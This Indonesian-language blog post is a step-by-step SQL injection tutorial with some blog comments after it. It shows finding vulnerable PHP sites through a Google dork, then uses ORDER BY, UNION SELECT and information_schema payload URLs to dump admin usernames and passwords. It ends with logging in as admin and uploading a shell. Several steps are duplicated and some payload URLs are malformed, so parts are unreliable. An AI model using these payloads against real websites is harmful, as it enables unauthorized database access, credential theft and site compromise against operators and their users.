Dorks Google : inurl:.php?=
Petama :
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
/news.php?id=-100 atau /news.php?id=2'
Kedua:
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
contoh:
[site]/news.php?id=2+order+by+1 --
sekarang cek secara satu per satu
contoh:
/news.php?id=2+order+by+1 --
contoh:
/news.php?id=-100 atau /news.php?id=2'
Kedua:
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
contoh:
[site]/news.php?id=2+order+by+1 --
sekarang cek secara satu per satu
contoh:
/news.php?id=2+order+by+1 --
/news.php?id=2+order+by+2 --
/news.php?id=2+order+by+3 --
/news.php?id=2+order+by+4 --sehingga muncul error atau hilang pesan error...
misal:
/news.php?id=2+order+by+5 --
berarti yang kita ambil adalah sampai angka 4
menjadi
/news.php?=id=100+union+select+4--
Ketiga
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
/news.php?=id=100+order+by+4--
Ok ,yangg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
/news.php?=id=100+union+select+1,version(),3,4--
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema
Keempat
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir
contoh:
[/news.php?=id=100+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
seumpama yg kita cari adalah "admin"
Kelima
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir
/news.php?=id=100+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :
http://tools.vyc0d.com/converter/
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e
/news.php?=id=100+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--
Keenam
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
/news.php?=id=100+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--
contoh kata yang keluar adalah adminID,Name,password
maka
/news.php?=id=100+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--
Nah dah nemu ID dan password-nya sekarang
ket: 0x3a sama dengan : <- titik dua
Ketujuh
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY........
created : http://www.kimmonosz.co.cc/2009/11/tutorial-sql-injection.html
This comment has been removed by a blog administrator.
ReplyDelete:a:
ReplyDeletehttp://lh5.ggpht.com/_UEOySJCSmVg/SzAiJIxYjYI/AAAAAAAAAfU/R7Oy5x5EaGM/s800/I-Luv-Indonesia.gif
ReplyDeletehttp://lh5.ggpht.com/_UEOySJCSmVg/SzAiJIxYjYI/AAAAAAAAAfU/R7Oy5x5EaGM/s800/I-Luv-Indonesia.gif